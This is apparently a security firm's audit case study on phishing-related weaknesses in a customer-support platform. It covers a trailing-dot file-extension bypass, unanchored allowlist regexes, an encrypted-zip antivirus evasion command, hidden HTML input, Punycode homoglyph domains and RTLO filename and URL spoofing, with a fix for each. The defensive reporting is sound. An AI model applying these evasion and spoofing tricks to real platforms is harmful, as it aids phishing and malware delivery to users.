While such threats cannot be fully eliminated, it is possible to minimize the possibilities for exploitation. Recognizing this, Doyensec was hired to performed a security review, specifically focused on social engineering attacks and phishing in particular. The engagement, performed earlier this year, has proven to be extremely valuable for both parties. Most importantly, our client used to the results to greatly increase their platform’s resilience against social engineering attacks. Additionally, Doyensec engineers had a great opportunity to unleash their creativity on bugs that are often overlooked, or at least heavily undervalued (looking at you, CVSS score!), during standard security audits as well as the opportunity to look at defending the application from a blue-team perspective.

The following case study will discuss some of the vulnerabilities that were addressed as part of this audit. Hopefully, this post will be useful for developers to understand what kind of vulnerabilities can be lurking in their platforms too. It also helps to demonstrate how valuable such focused engagements can be as an addition to standard web engagements.

Attachments Handling

For any customer support organization, file attachment management is a crucial feature. On one hand, it is crucial for users to be able to share file samples, screenshots, etc. with their interlocutors. On the other hand, sharing files is always a hotbed for exploiting all manner of security bugs, especially when accepting files from untrusted parties. Therefore, hardening this part of the application will always require careful considerations as to how to ensure confidentiality and integrity without sacrificing usability.

File Extension Restriction Bypass via Trailing Period

The tested platform employs a robust system designed to validate allowed file extensions and content types for file uploads, featuring a global ban list for inherently dangerous file types, such as executables (e.g., .exe). These measures are intended to prevent the uploading and distribution of potentially malicious files. However, by exploiting some browsers’ quirks, a vulnerability was discovered that allowed users to bypass these restrictions simply by appending a trailing period (“dangling dot”) to the file extension.

It was possible to bypass this file extension restriction by crafting an upload request with a prohibited extension, such as .exe.. This resulted in the system accepting the file, since it ostensibly met the criteria for allowed uploads - which included an empty extension. However, Firefox and Chromium-based browsers remove the dangling dot (interestingly, Safari retains it). As a result, the file was saved with an original .exe extension on the victim’s filesystem:

Dangling Dot Download Result

The recommendation is simple here. Trailing dots should be removed from the filenames. It rarely has any use in real-world scenarios, therefore the usability tradeoff is minimal.

Circumvention of Content Origin Restrictions via Subdomain Crafting

Platform chats have been created with a restriction, which allows link attachments from our client’s subdomains only. This security control is designed to restrict uploads and references to images and attachments to a predefined set of origins, preventing the use of external sources that could be employed in phishing attacks. The intended validation process relies on an allowlist of domains.

However, when validating (sub)domains using regular expressions, it’s easy to forget the intricacies of this syntax, which can lead to hard-to-spot bypasses.

Doyensec observed that subdomains were matched using an allowlist of regular expressions similar to /acme-attachments-1.com/. Such a regular expression does not enforce the beginning and the end of the string and will therefore accept any domains that contain the desired subdomain. An attacker could create a subdomain similar to acme-attachments-1.com.doyensec.com, which would be accepted despite this security mechanism.

Another common (although not exploitable in this case) mistake is forgetting that the dot (.) character is treated as a wildcard by regular expressions. When one forgets to escape a dot in a domain regex, an attacker can register a domain which will bypass such a restriction. For instance, a regular expression similar to downloads.acmecdn.com would accept an attacker-controlled domain like downloadsAacmecdn.com.

It is worth noting that as innocuous as this vulnerability seems to be, it actually has great potential for creating successful phishing attacks. When a victim receives an attachment in a trusted platform, they’re far more likely to follow the link. Also, a login page would not be surprising for a victim, further increasing the likelihood of them giving away their credentials.

Antivirus Scan Bypass

The platform appropriately implements antivirus scanning on all incoming files. However, an attacker could obfuscate the true content of the payload by creating an encrypted archive: $ zip -e test_encrypted.zip eicar.com.

There is no simple solution to solve this issue. Banning encrypted archives altogether is a usability trade-off that might be unacceptable in some cases. Doyensec recommended clearly warning users against opening encrypted files at the very least. It might be also useful to allow the clients to choose which side of this trade-off is acceptable for them by creating a proper configuration switch.

HTML Input Handling

When it comes to exchanging messages, it can be very useful to add formatting and give users more ways of expressing themselves. On the other hand, when messages are coming from untrusted sources, such a feature can enable attackers to craft sophisticated attacks that involve UI redressing, e.g., emulating UI elements within their messages.

Our client has found a great way to balance usability and security. While trusted users have a rich choice of input formatting options, untrusted users from outside the platform can only share basic plain-text messages. It also worth noting that even trusted users can’t inject arbitrary HTML to their messages, given that HTML tags are properly parsed and encoded. There are however specific tags that are allowed and, in some cases, converted into more elaborate elements (e.g., link tags get converted into buttons).

Doyensec found this solution well-architected at the design level. However, due to an oversight in the implementation, the public messaging API also accepted a “hidden” (not used by the frontend) parameter which allowed some HTML elements. Doyensec was able to exploit the conversion of links into buttons to demonstrate the potential for UI elements to be spoofed using this vulnerability.

HTML Injection Body Parameter

The issue was resolved by completely disabling this parameter in the public API, only allowing authenticated users to format their messages.

Links Presentation Bugs

Data presentation bugs are a threat that is especially overlooked. Despite their potential to manipulate or distort critical information, data presentation bugs are frequently underestimated in security assessments and overlooked in the prioritization of remediation efforts. However, their exploitation can lead to serious consequences including phishing.

Misleading Unicode Domain Rendering

To understand this issue, it is important to understand two different terms. First, Punycode which is a character encoding scheme used to represent Unicode characters in domain names. It enables browsers and other web clients to handle Unicode in domain names. Secondly, we have homoglyphs, which are characters that look very similar to each other, but have different codes. While being visually indistinguishable, consider that the characters ‘a’ (code: 0x61) and ‘а’ (code: 0x430) are actually two different characters leading to two different domains when used in a URL.

One of the most prominent examples of this threat was created by the researcher Xudong Zheng. This researcher created a link that looks deceivingly similar to the widely trusted www.apple.com domain. However, the link https://www.аррӏе.com actually resolves to www.xn--80ak6aa92e.com, after unrolling the Punycode string. Visiting the link reveals that it is not controlled by Apple, despite its convincing appearance:

Example Punycode Domain Screenshot

To protect users from these types of issues, we recommended rendering Unicode domains in Punycode format. This way users are not deceived in regards to where the given link leads.

URI and Filename Spoofing via RTLO Injection

Using the Right-To-Left Override (RTLO) character is another technique for manipulating the way links are displayed. The RTLO character changes the order in which consecutive characters are rendered. When it comes to filenames and URLs, their structures are fixed and the character order matters. Therefore, flipping the character order is an effective way of obscuring the true target of the link, or the extension of a file.

Sound complicated? An example will clear it up. Consider the link to an attacker-controlled domain: https://gepj.net/selif#/moc.rugmi It looks suspicious, however when prepended with the RTLO Unicode character ([U+202E]https://gepj.net/selif#/moc.rugmi) it’ll render in the following way:

Example RTLO Domain

A displayed file extensions can be manipulated in a similar manner:

Consider a file named test.[U+202E]fdp.zip:

Example RTLO Filename

The proposed solution here is simple - stricter filtering. URLs should not be rendered as links when the character order is changed. Similarly, filenames containing character flow manipulators should be rejected.

Even when the links are always properly displayed, there still remains a chance that an attacker can create a successful phishing campaign. After all, users could always get coerced into following a malicious link. Such a risk cannot be fully eliminated, but it can be mitigated with additional hardening. The examined platform implements navigation confirmation interstitials. This means, that anytime a user follows a link outside of the platform, an additional confirmation screen will appear. Such UI elements inform the user that they’re leaving a safe environment. This UX design greatly decreases the chances of a successful phishing attack.


This project is a great example of a proactive engagement against specific threats. Given the particular threat model of this platform, such an engagement has proven extremely useful as an addition to regular security assessments and their bug bounty program. In particular, an engagement specifically focused on phishing and social engineering allowed us to craft a list of recommendations and hardening ideas that would have otherwise just been a side note in a regular security review.